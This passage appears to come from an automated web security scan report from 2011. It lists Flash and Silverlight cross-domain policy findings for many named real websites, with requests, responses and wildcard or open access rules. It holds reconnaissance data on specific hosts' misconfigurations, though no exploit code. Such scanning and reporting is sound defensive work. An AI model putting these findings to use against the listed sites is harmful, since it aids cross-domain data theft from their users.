   <allow-access-from domain="promotions.whymilk.com"/>
   <allow-access-from domain="bodybymilk.com"/>
   <allow-access-from domain="www.bodybymilk.com"/>
   <allow-access-from domain="whymilk.com"/>
...[SNIP]...
<allow-access-from domain="dev.bodybymilk.com"/>
   <allow-access-from domain="*.draftfcb.net"/>
   <allow-access-from domain="speed.pointroll.com"/>
   <allow-access-from domain="data.pointroll.com"/>
   <allow-access-from domain="media.pointroll.com"/>
   <allow-access-from domain="mirror.pointroll.com"/>
   <allow-access-from domain="pointroll.com"/>
   <allow-access-from domain="www.pointroll.com"/>
   <allow-access-from domain="facebook.com"/>
   <allow-access-from domain="*.facebook.com"/>
   <allow-access-from domain="*.eligeleche.com"/>
...[SNIP]...
8.110. http://www.wpsdlocal6.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.wpsdlocal6.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wpsdlocal6.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sat, 30 Apr 2011 17:03:23 GMT
X-Server-Name: dv-c1-r2-u7-b6
Content-Type: text/xml;charset=utf-8
Date: Sun, 01 May 2011 23:11:27 GMT
Content-Length: 7031
Connection: close
Set-Cookie: click_mobile=0

<?xml version="1.0" encoding="UTF-8" ?>
<cross-domain-policy>
<allow-access-from domain="*.bimtv3.bimedia.net"/>
<allow-access-from domain="*.bimtv.bimedia.net"/>
<allow-access-from domain="*.bimedia.net"/>
<allow-access-from domain="*.younewstv.com"/>
<allow-access-from domain="*.broadcast-interactive.com"/>
<allow-access-from domain="*.media.broadcast-interactive.com"/>
<allow-access-from domain="*.bimedia.net"/>
<allow-access-from domain="*alpha.bimedia.net"/>
<allow-access-from domain="*echo.bimedia.net"/>
<allow-access-from domain="*echo2.bimedia.net"/>
<allow-access-from domain="*content.bimedia.net"/>
<allow-access-from domain="*alpha.bimedia.net"/>
<allow-access-from domain="*content.bimedia.net"/>
<allow-access-from domain="*.2news.tv"/>
<allow-access-from domain="*.aksuperstation.com"/>
<allow-access-from domain="*.belo.com"/>
<allow-access-from domain="*.centralillinoisnewscenter.com"/>
<allow-access-from domain="*.cbs3springfield.com"/>
<allow-access-from domain="*.explorepolitics.com"/>
<allow-access-from domain="*.granitetv.com"/>
<allow-access-from domain="*.indianasnewscenter.com"/>
<allow-access-from domain="*.katu.com"/>
<allow-access-from domain="*.kcby.com"/>
<allow-access-from domain="*.kcrg.com"/>
<allow-access-from domain="*.kens5.com"/>
<allow-access-from domain="*.keprtv.com"/>
<allow-access-from domain="*.keyt.com"/>
<allow-access-from domain="*.kfbb.com"/>
<allow-access-from domain="*.kgw.com"/>
<allow-access-from domain="*.khou.com"/>
<allow-access-from domain="*.kidk.com"/>
<allow-access-from domain="*.kimatv.com"/>
<allow-access-from domain="*.king5.com"/>
<allow-access-from domain="*.klewtv.com"/>
<allow-access-from domain="*.kmov.com"/>
<allow-access-from domain="*.knin.com"/>
<allow-access-from domain="*.komonews.com"/>
<allow-access-from domain="*.kpic.com"/>
<allow-access-from domain="*.krem.com"/>
<allow-access-from domain="*.ksee24.com"/>
<allow-access-from domain="*.ksbitv.com"/>
<allow-access-from domain="*.ktnv.com"/>
<allow-access-from domain="*.ktvb.com"/>
<allow-access-from domain="*.clickability.com"/>
<allow-access-from domain="*.kval.com"/>
<allow-access-from domain="*.kvi.com"/>
<allow-access-from domain="*.kvue.com"/>
<allow-access-from domain="*.kulr8.com"/>
<allow-access-from domain="*.northlandsnewscenter.com"/>
<allow-access-from domain="*.nwcn.com"/>
<allow-access-from domain="*.star1015.com"/>
<allow-access-from domain="*.tv20detroit.com"/>
<allow-access-from domain="*.wbng.com"/>
<allow-access-from domain="*.wcnc.com"/>
<allow-access-from domain="*.wdtv.com"/>
<allow-access-from domain="*.whas11.com"/>
<allow-access-from domain="*.wkbw.com"/>
<allow-access-from domain="*.wwltv.com"/>
<allow-access-from domain="*.wltz.com"/>
<allow-access-from domain="*.wnky.net"/>
<allow-access-from domain="*.wfaa.com"/>
<allow-access-from domain="*.wvec.com"/>
<allow-access-from domain="*.abc6.com"/>
<allow-access-from domain="*.wktv.com"/>
<allow-access-from domain="*.wgbctv.com"/>
<allow-access-from domain="*.wmdntv.com"/>
<allow-access-from domain="*.kjzz.com"/>
<allow-access-from domain="*.abcmontana.com"/>
<allow-access-from domain="*.wncftv.com"/>
<allow-access-from domain="*.ugclocal.com"/>
<allow-access-from domain="*.kmvt.com"/>
<allow-access-from domain="*.cnn.com"/>
<allow-access-from domain="*.bakersfieldnow.com"/>
<allow-access-from domain="*.wmdntv.com"/>
<allow-access-from domain="*.wgbctv.com"/>
<allow-access-from domain="*.nbcuxd.com"/>
<allow-access-from domain="*.bakersfieldnow.com"/>
<allow-access-from domain="*.indiancountrytoday.com"/>
<allow-access-from domain="*.indiancountry.com"/>
<allow-access-from domain="*.pro8news.com"/>
<allow-access-from domain="*.oneidaindiannation.com"/>
<allow-access-from domain="*.oneidanation.net"/>
<allow-access-from domain="*.kofytv.com"/>
<allow-access-from domain="*.wrdetv.com"/>
<allow-access-from domain="*.lively-nation.com"/>
<allow-access-from domain="*.ucdailynews.com"/>
<allow-access-from domain="*.wjys.tv"/>
<allow-access-from domain="*.wavenewspapers.com"/>
<allow-access-from domain="*.wwnytv.com"/>
<allow-access-from domain="*.laindependent.com"/>
<allow-access-from domain="*.fox24.com"/>
<allow-access-from domain="*.cachevalleydaily.com"/>
<allow-access-from domain="bim.images.vidavee.com"/>
<allow-access-from domain="*.king5.com"/>
<allow-access-from domain="*.sharinghope.tv"/>
<allow-access-from domain="*.azfamily.com"/>
<allow-access-from domain="*.wpsdlocal6.com"/>
<allow-access-from domain="*.bimvid.com"/>
<allow-access-from domain="*.fox11az.com"/>
<allow-access-from domain="*.kissfmnews.com"/>
<allow-access-from domain="*.mychristiantv.net"/>
<allow-access-from domain="*.cheeseheadtalk.com"/>
<allow-access-from domain="*.myfoxmaine.com"/>
<allow-access-from domain="*.foxcharlotte.com"/>
<allow-access-from domain="*.wfrv.com"/>
<allow-access-from domain="*.wfxb.com"/>
<allow-access-from domain="*.newscentralga.com"/>
<allow-access-from domain="*.worcestermag.com"/>
<allow-access-from domain="*.khastv.com"/>
<allow-access-from domain="*.krextv.com"/>
<allow-access-from domain="*.bimlocal.com"/>
<allow-access-from domain="*.foxillinois.com"/>
<allow-access-from domain="*.thetobagonews.com"/>
<allow-access-from domain="*.trinidadexpress.com"/>
<allow-access-from domain="*.reachcaribbean.com"/>
<allow-access-from domain="*.klassicgrenada.com"/>
<allow-access-from domain="*.sixpointtt.com"/>
<allow-access-from domain="*.trinivoices.com"/>
<allow-access-from domain="*.fox50.com"/>
<allow-access-from domain="*.youralaskalink.com"/>
<allow-access-from domain="*.thehomeforinnovation.com"/>
<allow-access-from domain="*.classicrock102.net"/>
<allow-access-from domain="test.library.contentexchange.titantv.com"/>
<allow-access-from domain="*.titantv.com"/>
<allow-access-from domain="*.decisionmark.com"/>
<allow-access-from domain="*.newstalkkcrs.com"/>
<allow-access-from domain="*.1033kissfm.net"/>
<allow-access-from domain="*.mymix1067.com"/>
<allow-access-from domain="*.mycountry961.com"/>
<allow-access-from domain="*.myironmanstory.com"/>
<allow-access-from domain="*.kcwx.com"/>
<allow-access-from domain="*.ncwtv.com"/>
<allow-access-from domain="*.wktctv.com"/>
<allow-access-from domain="*.krbkhd.com"/>
<allow-access-from domain="*.ktva.com"/>
<allow-access-from domain="*.baystateparent.com"/>
<allow-access-from domain="*.itsyourbiz.com"/>
<allow-access-from domain="*.accuweather.com"/>
<allow-access-from domain="*.kmvt-1.com"/>
<allow-access-from domain="*.wbbjtv.com"/>
<allow-access-from domain="*.abccolumbia.com"/>
<allow-access-from domain="*.ntwinecx.com"/>
<allow-access-from domain="*.ntwineapp.com"/>
<allow-access-from domain="*.sbtv.com"/>
<allow-access-from domain="*.allbusiness.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.hoovers.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dnb.com" secure="false"/>
...[SNIP]...
8.111. http://www.wretch.cc/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.wretch.cc
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wretch.cc

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 17:24:11 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: max-age=5184000
Expires: Sun, 26 Jun 2011 17:24:11 GMT
Last-Modified: Fri, 22 Apr 2011 11:40:10 GMT
Accept-Ranges: bytes
Content-Length: 339
Vary: Accept-Encoding
Content-Type: application/xml
Age: 372381
Via: HTTP/1.1 r4.ycpi.tp2.yahoo.net (YahooTrafficServer/1.19.5 [cHs f ])
Server: YTS/1.19.5

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-p
...[SNIP]...
<allow-access-from domain="*.wretch.cc" />
<allow-access-from domain="*.yahoo.com" />
...[SNIP]...
8.112. http://www.youneek.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.youneek.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youneek.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:20:34 GMT
Server: Apache
Content-Length: 224
Cache-Control: public;max-age=86400
Expires: Tue, 03 May 2011 00:20:34 GMT
Last-Modified: Thu, 21 Apr 2011 00:10:23 GMT
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.YourSiteDomain.com" />
...[SNIP]...
8.113. http://www.argosy.edu/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.argosy.edu
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.argosy.edu

Response

HTTP/1.1 200 OK
Content-Length: 272
Content-Type: text/xml
Last-Modified: Thu, 13 Oct 2005 14:41:11 GMT
Accept-Ranges: bytes
ETag: "809d6f274d0c51:fc87"
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:00:38 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.pointroll.com" />
<allow-access-from domain="pointroll.com" />
...[SNIP]...
8.114. http://www.babybottlepop.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.babybottlepop.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.babybottlepop.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:23:03 GMT
Server: Apache
Content-Type: text/xml
Last-Modified: Fri, 14 Jan 2011 01:42:18 GMT
ETag: "1bf8022-216-499c48b62f280"
Accept-Ranges: bytes
Age: 0
Via: HTTP/1.1 www.babybottlepop.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Sun, 06 Mar 2011 12:20:26 GMT
Warning: 110 dfw107021 "Response is stale" "Mon, 02 May 2011 00:23:03 GMT"
Via: 1.1 dfw107021 (MII-APC/2.0)
x-mii-cache-hit: 1
Content-Length: 534
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <!-- <allow-access-from domain="*"/> -->
   <allow-access-from domain="origin.babybottlepop.com" />
...[SNIP]...
<allow-access-from domain="cache.babybottlepop.com" />
   <allow-access-from domain="babybottlepop.com" />
   <allow-access-from domain="68.170.132.138" />
   <allow-access-from domain="wrpx2.service.mirror-image.net" />
...[SNIP]...
8.115. http://www.bluesplayer.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluesplayer.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bluesplayer.co.uk

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 00:10:50 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "fc-4cbc1bc5-0"
Last-Modified: Mon, 18 Oct 2010 10:04:53 GMT
Content-Type: application/xml
Content-Length: 252

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="x.mochiads.com"/>
<allow-access-from domain="www.mochiads.com"/>
<allow-access-from domain="www.mochimedia.com"/>
...[SNIP]...
8.116. http://www.hotwheelscollectors.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotwheelscollectors.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hotwheelscollectors.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:14:00 GMT
Server: MII-WSD/1.4
Last-Modified: Fri, 14 May 2010 21:03:32 GMT
Accept-Ranges: bytes
ETag: "2d905e9a8f3ca1:4a7"
X-Powered-By: ASP.NET
Age: 0
Via: HTTP/1.1 www.hotwheelscollectors.com (MII-WSD/1.4)
x-Message1: Powered by Mirror Image Internet
Expires: Mon, 02 May 2011 02:14:00 GMT
Cache-Control: max-age=10800
Content-Type: text/xml
Content-Length: 439
Via: 1.1 mdw107101 (MII-APC/1.6)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="mbws.mattel.com" />
<allow-access-from domain="estwr-25-90.corp.mattel.com" />
<allow-access-from domain="battleforce5.com" />
<allow-access-from domain="dev.battleforce5.net" />
<allow-access-from domain="dev.mattel.net" />
...[SNIP]...
8.117. http://www.mdconsult.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mdconsult.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mdconsult.com

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/4.1
Date: Mon, 02 May 2011 00:11:14 GMT
P3P: CP="ALL CURa DEVa TAIa OUR IND PHY ONL UNI PUR DEM STA"
Content-type: text/xml
Last-modified: Sun, 09 May 2010 07:53:54 GMT
Content-length: 221
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="mdconsult.stepchanger.com" />
<
...[SNIP]...
8.118. http://www.oshkoshbgosh.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oshkoshbgosh.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.oshkoshbgosh.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:44:36 GMT
Server: Apache
Content-Length: 277
Cache-Control: public;max-age=85410
Expires: Tue, 03 May 2011 00:28:06 GMT
Last-Modified: Fri, 29 Apr 2011 02:05:53 GMT
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="demandware.edgesuite.net" />
<allow-access-from domain="carters.com" />
...[SNIP]...
8.119. http://www.ourmidland.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ourmidland.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ourmidland.com

Response

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 2081380
Content-Type: text/x-cross-domain-policy; charset=UTF-8
X-TNCMS-Venue: app
Date: Mon, 02 May 2011 00:14:48 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0379
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: ourmidland.com
X-TNCMS-Served-By: cmsapp14
Content-Length: 315

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM
               "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="bloximages.chicago2.vip.townnews.com" to-ports="80" secure="false"/>
...[SNIP]...
8.120. http://www.recordslogin.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.recordslogin.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.recordslogin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:25:04 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 21 Jan 2009 05:20:53 GMT
ETag: "410131-7d-460f751d5d740"
Accept-Ranges: bytes
Content-Length: 125
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.gov-records.com" />
</cross-domain-policy>

8.121. http://www.reelseo.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reelseo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.reelseo.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:37:56 GMT
Server: Apache
Last-Modified: Tue, 29 Jun 2010 04:58:59 GMT
ETag: "116-48a24185c4ac0"
Accept-Ranges: bytes
Content-Length: 278
Cache-Control: public, must-revalidate, proxy-revalidate
Expires: Mon, 02 May 2011 01:37:56 GMT
Vary: Accept-Encoding,User-Agent
Pragma: public
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!-- http://media.reelseo.com/player/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="www.reelseo.com" />
<allow-access-from domain="media.reelseo.com" />
<allow-access-from domain="audio.reelseo.com" />
...[SNIP]...
8.122. http://www.slotocash.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.slotocash.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.slotocash.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:25:36 GMT
Server: Apache
Last-Modified: Wed, 01 Oct 2008 16:25:41 GMT
Accept-Ranges: bytes
Content-Length: 325
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="get.slotocash.com" />
<allow-access-from domain="slotocash.com" />
...[SNIP]...
8.123. http://www.solidworks.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.solidworks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.solidworks.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Location: http://www.solidworks.com/crossdomain.xml
Last-Modified: Mon, 14 Sep 2009 20:51:00 GMT
ETag: "7ed6cb107d35ca1:c1f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Date: Sun, 01 May 2011 23:45:10 GMT
Content-Length: 397
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="http://files.solidworks.com" />
<allow-access-from domain="files.solidworks.com" />
<allow-access-from domain="www.romercreative.com" />
<allow-access-from domain="romercreative.com" />
...[SNIP]...
8.124. http://www.undisciplined-subs.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.undisciplined-subs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.undisciplined-subs.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:47:51 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4 mod_ssl/2.8.28 OpenSSL/0.9.7e
Last-Modified: Fri, 16 Jan 2009 16:15:17 GMT
ETag: "17f61e8-d0-4970b295"
Accept-Ranges: bytes
Content-Length: 208
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy (View Source for full doctype...)>
<cross-domain-policy>
<allow-access-from domain="members.burningticket.com" secure="true" />
</cross-domain
...[SNIP]...
8.125. http://www.uni.edu/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uni.edu
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.uni.edu

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:19:45 GMT
Server: Apache
Last-Modified: Wed, 13 Apr 2011 18:52:21 GMT
ETag: "c002-1c4-4a0d14f024340"
Accept-Ranges: bytes
Content-Length: 452
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.uni.edu"/>
<allow-access-from domain="live.uni.edu"/>
<allow-access-from domain="media22.uni.edu"/>
<allow-access-from domain="wwwstage.uni.edu"/>
<allow-access-from domain="wwwdev.uni.edu"/>
<allow-access-from domain="drupal-lab.its-ns.uni.edu"/>
...[SNIP]...
8.126. http://www.voiceofsandiego.org/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.voiceofsandiego.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.voiceofsandiego.org

Response

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 2088212
Content-Type: text/x-cross-domain-policy; charset=UTF-8
X-TNCMS-Venue: app
Date: Mon, 02 May 2011 00:53:45 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0367
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: voiceofsandiego.org
X-TNCMS-Served-By: cmsapp15
Content-Length: 315

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM
               "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="bloximages.chicago2.vip.townnews.com" to-ports="80" secure="false"/>
...[SNIP]...
8.127. http://www.walthers.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.walthers.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.walthers.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:39:06 GMT
Server: Apache
Last-Modified: Fri, 25 Feb 2011 21:04:04 GMT
ETag: "1c083fe-105-49d21ab85d900"
Accept-Ranges: bytes
Content-Length: 261
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="www.walthers.com" />
   <allow-access-from domain="walthers.com" />
...[SNIP]...
9. Silverlight cross-domain policy  previous  next
There are 6 instances of this issue:

9.1. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Sun, 01 May 2011 23:33:33 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...
9.2. http://b.scorecardresearch.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Mon, 02 May 2011 23:34:41 GMT
